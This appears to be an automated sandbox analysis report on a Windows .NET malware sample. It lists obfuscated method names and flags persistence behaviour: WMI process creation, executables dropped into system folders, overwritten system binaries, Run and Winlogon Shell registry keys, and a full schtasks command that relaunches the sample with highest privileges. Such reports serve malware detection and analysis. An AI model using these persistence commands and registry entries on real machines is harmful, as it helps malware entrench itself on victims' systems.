                            Source: 9XHFe6y4Dj.exe, tiVZ0T4wUHB2hb2JKnh.csHigh entropy of concatenated method names: 'U1Q4gajXT0', 'mGL48nuhfa', 'cA543wlKSt', 'xET4didKpR', 'OyQ4Z7DEdR', 'kt04cau9bL', 'JaB4m1PjkS', 'JTf4yuO3TB', 'dWQ4VVE5n9', 'vBf4rDg59S'
                            Source: 9XHFe6y4Dj.exe, qZEXBcg3xcTMws5yFmP.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                            Source: 9XHFe6y4Dj.exe, nQOPnvdQWZGskax9j8V.csHigh entropy of concatenated method names: 'UjdZu2ewMH', 'WBZCAjYf7TQnK1j1kTHO', 'UyoZLuYfsqXA37VLSU4W', 'YHTXb1YfxfAbHJ1IZOeW', 'A3H1ncYfBhGGfstrk97Z', 'kt5', 'X9pdGrmt1w', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                            Source: 9XHFe6y4Dj.exe, KoCmuV42bjP5cVjA3f1.csHigh entropy of concatenated method names: 'XHtYUdkuG5N', 'PwvYUZ62B1Z', 'FRNYUcguKL3', 'gW5YUmxcAWi', 'vBZYUyOnVbG', 'TIlYUVStIXY', 'gqGYUrnsdtq', 'qC2JoYo8tp', 'uDSYU2Mww8i', 'XnsYUCF2rTq'
                            Source: 9XHFe6y4Dj.exe, w56OIlnTPHgQNaYV8IP.csHigh entropy of concatenated method names: 'B24YKO49GBQ', 'AeInXh1t2o', 'lFpYKePGLGL', 'uKYgQBYj8BXapWSCACZx', 'fkLxC9Yj3cRKHbfEyMgL', 'YbChm8YjIbpATVyl16jl', 'TYSgAoYjg4EOc9LwwILc', 'o562fJYjd0FWwi83ufNc', 'poVaocYjZqgZTyWuU76G', 'iHepe8YjcuP2ilJ7uT2U'
                            Source: 9XHFe6y4Dj.exe, Ri3sBVQvCnnJAIy1KNt.csHigh entropy of concatenated method names: 'UDapmsYHLKbNn8dY6um7', 'UkqqdrYHq8iULXSMskrc', 'dr9P2sYHASNNpV7ny46B', 'BjA7c0YHGPuJt0FmkD13', 'method_0', 'method_1', 'UeyQeamSbG', 'RfbQwnepeV', 'MwFQiJBJfk', 'DOBQnct6DH'
                            Source: 9XHFe6y4Dj.exe, UEJ2CViFHBmcnPIaOMD.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'MEyYKb8D3AO', 'GNBYpkUMcDy', 'yHGKNHYClJ024uUqcgif', 'PXkuxrYCavNgwNw1NS5b', 'pRvXi5YCIXFUwWutNhHS', 't7laClYCgP451eBNFE0M', 'Jnmp0BYC85EToLkJ1fm0'
                            Source: 9XHFe6y4Dj.exe, hLVK3U6L9cL7nmWs6H5.csHigh entropy of concatenated method names: 'mWchNrYVydmGIjNPHHGy', 'wdoSd1YVcnTtQPMBIBy5', 'wJ8h9uYVmdWnbyx6N4QL', 'oK59ZlYVVQ63aohYbNTi', 'KvEuJpkDbh', 'mbqiGQYV2HZrpsejPo6s', 'EJ5i3MYVCch81RZHkQlJ', 'QPUpKHYVjl015FuH0soO', 'FtBDymYVHj2kqtT9r6NO', 'm3lMYpibCO'
                            Source: 9XHFe6y4Dj.exe, RFl9fbZftUGU4eKkgds.csHigh entropy of concatenated method names: 'voMZDbT1Gm', 'k6r', 'ueK', 'QH3', 'TaWZFl5IYp', 'Flush', 'D6CZsXAvaP', 'zo9ZxAeQG1', 'Write', 'iVuZ7tGWbL'
                            Source: 9XHFe6y4Dj.exe, m0ppOfajtaIK2icrAFp.csHigh entropy of concatenated method names: 'zdsa4KtDxn', 'f6XazYZDWb', 'NJVaWre2p6', 'kMNatebLgu', 'nfIakwOGss', 'ilNaEtn0RX', 'MBSa5x51rD', 'TCNaTSV8rv', 'HlJafjdysf', 'NDNaXft6rO'
                            Source: 9XHFe6y4Dj.exe, wa6nIYahHoOlxBwYCjW.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'YhbaouA0RQ', 'Write', 'MvEaUUDqB2', 'IaPa0P6qTu', 'Flush', 'vl7'
                            Source: 9XHFe6y4Dj.exe, pqjyY1oX2kqK83hsEYa.csHigh entropy of concatenated method names: 'YvToBJbqOi', 'nTyo40BZAb', 'sijoJevSeL', 'SwVozPNq1t', 'AfUU1uNGbt', 'uJWUYIDnNJ', 'dugUNiZB6p', 'CSfRaaYdSXAuLSEnbNfX', 'NKQV8VYdbT66nTDUvPDL', 'iCyVnsYdRLIZgBPskwNm'
                            Source: 9XHFe6y4Dj.exe, TfmZxSCmDxZwEihILUs.csHigh entropy of concatenated method names: 'ad657IYs7vZYppSuFtZ8', 'ySZHL0YsBcYkKxQSALVJ', 'PbGde9YssMNlYctCB1TM', 'f8tbWVYsxdIxeyE1C7Su', 'TUQERbYsf2Z8cnV5uM9B', 'm5ijqYYsXPuujPfhbHTh', 'BLQ5efYsD9I1HkoAEp7m', 'DBbd5eYs5fYFUgxaweMC', 'bIxoY1YsTQ1jv3srqpqc'
                            Source: 9XHFe6y4Dj.exe, BamFZCsde8NQLA0dZSw.csHigh entropy of concatenated method names: 'eKLsc9ltsi', 'QvZsmBvaW4', 'ng0sy2hkTX', 'wOUsVAnr2t', 'E3gsrxaKE2', 'w3os2ywddK', 'KRnsCLIMuV', 'Mlssjcivki', 'reDsHsy0S9', 'kbRsWFqCeq'
                            Source: 9XHFe6y4Dj.exe, rkdIIHKaPDjjMHdxDwB.csHigh entropy of concatenated method names: 'a5cKgS9uv2', 'xiFK8B2IhT', 'z6cK3nKF11', 'NKOKddDrOX', 'Ke3KZg7I8h', 'BJ6Kc0tF1D', 'Up19YVYcf8t6YNmHqZ2C', 'iVNX2BYcXd9U2R1ZWI0n', 'PpuT7OYcDNapPNEXnf4s', 'Drbt7IYcF8uoa5cg3Mor'
                            Source: 9XHFe6y4Dj.exe, bV5aOkM9iivGpAZApdd.csHigh entropy of concatenated method names: 'Dispose', 'XKIMbbArrv', 'FQGMuFW4Lu', 'nWwMMhM8fW', 'Nvi2tBYV4CfaROg7UQyv', 'hFVG6VYVJamw3vwB7igG', 'Q88SWvYVztcZ5e3cd8Qg', 'CsMjmxYr1lR0ntvDF7UM', 'hOA45PYrYfgcH0NsR6oq'
                            Source: 9XHFe6y4Dj.exe, VySNmjqW4ssxMi0Bbnd.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'vsoqkKVsbE', 'npZqENXMtZ', 'Dispose', 'D31', 'wNK'
                            Source: 9XHFe6y4Dj.exe, y3X7V6NoFkfF5gMSi3o.csHigh entropy of concatenated method names: 'B0JN0wBc3C', 'rC7NKuAo7p', 'vZhN6hWXEs', 'C23NRJLMvl', 'sROOiDYIRC9AqDYKWQwW', 'BLc8DlYIK0Hd1WLavhJI', 'iLo08gYI6xmHeprqg69r', 'BtxrF6YI9chqs5ws6Vqo', 'bsVTVUYISCxPdlwlE3cI', 'u4ORqbYIbJeUAYTiqJxv'
                            Source: 9XHFe6y4Dj.exe, UvRUV13KHsRvdaOQN9u.csHigh entropy of concatenated method names: 'dBC3RgoBwD', 'zW8398C4cK', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'jPP3ScAXUW', 'method_2', 'uc7'
                            Source: 9XHFe6y4Dj.exe, ynDMUr3BTbCseUvMTwM.csHigh entropy of concatenated method names: 'lES3JR7Nld', 'g8u3zsEFhb', 'zMRd1p7RVZ', 'sLodYgc9Ow', 'vRmdNAC8VO', 'VRPdhe0p0s', 'Rpx', 'method_4', 'f6W', 'uL1'
                            Source: 9XHFe6y4Dj.exe, tJtcIM6ulchqUBnncjV.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'oD6ykRYmy0gELVcfxkwL', 'SRIUoBYmVLLffpElrG8A', 'yTYWwxYmrW57H2YJtuLr', 'LnTjutYm2Bev8xYYG88y'
                            Source: 9XHFe6y4Dj.exe, UeFUGvymqoVTmbZPexe.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Y1CAu3YDcy8WNN8BYKK6', 'ckH2kTYDmAmNnDsMrmRO', 'wj582OYDyGCsmmpeQNLb'
                            Source: 9XHFe6y4Dj.exe, s14PV2IDgn1HpG3lrg6.csHigh entropy of concatenated method names: 'BhPIssg2pf', 'PKeIxdMCoF', 'xjVI7ZlVH9', 'Q7DIBnlre3', 'wHbI4nW70D', 'imb99pYExBkV7uaFnrSm', 'K5SH3nYEFvvIcaNxHIev', 'x8yQlZYEsFdIpHZ7y3WL', 'uDrbqxYE7icNAGUG2Zrj', 'V5yp9gYEBrNFinublXHV'
                            Source: 9XHFe6y4Dj.exe, cLstx8nxQlpwx8fXFBV.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'yv4nBCrQgn', 'f0cYKwrs5xs', 'hOggoAYjrW3hTBisuCxp', 'NjmOxcYjycOvkbRDBrsu', 'wwliJGYjVyUDfMqBT84x', 'b79Lk2Yj2lJhkWSnPBva', 'BmIYMvYjCqEgDZ8WSG6L'
                            Source: 9XHFe6y4Dj.exe, DTaRuel9hcU7Yb3eaZx.csHigh entropy of concatenated method names: 'TRklbyLTjR', 'jMDlumEKjA', 'NEVlMdELbX', 'Va0lvCoy1N', 'srvlOKaXqE', 'x0tgWYYknNA0OWvBQ0LR', 'tUGWFUYkwC4Z7gLJoY2I', 'GMv8DRYkiBdoKEBKGpxa', 'xhOVNVYkQmN5PsALtYm8', 'oKSJ6dYkASMcdVPn55MK'

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: unknownExecutable created and started: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\bIYNCAnX.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\yHSRySXa.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\zKTiJdVm.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\MlnyqaSB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\XjppJZgg.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\wQQSSdrw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\AKEAUBbV.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\LeSOATlM.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\xYZkNoRc.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\HobYtWlT.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\LmCheCMS.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\GzkiCFwe.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\oXLUJmZB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\JVSqkWFI.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ScGOdifB.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\jrGLbElV.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\BQsBwRkl.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ftgCpYKW.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\XPYNFevp.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ZInvrbgn.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\OoZhLKXw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\pSWUxCdp.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\TQKWOvbz.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\PNvPNCKx.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\QZUgHzbG.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\JTIguxNU.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\ioFvQtnJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\VNlekvqu.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\aZffRVgZ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\RORqBBDl.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\vcMKgPvy.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\qhLtZjFE.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\OXbzuEDs.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\taabLgrD.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\koiTwEAQ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\cmFWEbPY.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\fXkmLoaR.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\ohiUtZsx.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\mcmciRwO.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\HyVANeDN.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\vWmBrFMh.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\pkjlEjqK.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\FcMrvptI.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\GrAQXWWY.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\GrAQXWWY.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\pkjlEjqK.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\VNlekvqu.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\LeSOATlM.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\vcMKgPvy.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\koiTwEAQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ScGOdifB.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\HobYtWlT.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\zKTiJdVm.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\qhLtZjFE.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\JTIguxNU.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\GzkiCFwe.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\wQQSSdrw.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\mcmciRwO.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\TQKWOvbz.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\LmCheCMS.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\taabLgrD.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\jrGLbElV.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ZInvrbgn.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\QZUgHzbG.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ftgCpYKW.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\XPYNFevp.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\BQsBwRkl.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\fXkmLoaR.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\cmFWEbPY.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\JVSqkWFI.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\PNvPNCKx.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\oXLUJmZB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\ioFvQtnJ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\HyVANeDN.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\ohiUtZsx.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\MlnyqaSB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\bIYNCAnX.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\yHSRySXa.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\OoZhLKXw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\vWmBrFMh.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\AKEAUBbV.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\aZffRVgZ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\xYZkNoRc.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\XjppJZgg.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\FcMrvptI.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\RORqBBDl.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\pSWUxCdp.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\OXbzuEDs.logJump to dropped file

                            Boot Survival

                            barindex
                            Creates an autostart registry key pointing to binary in C:\Windows
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4DjJump to behavior
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
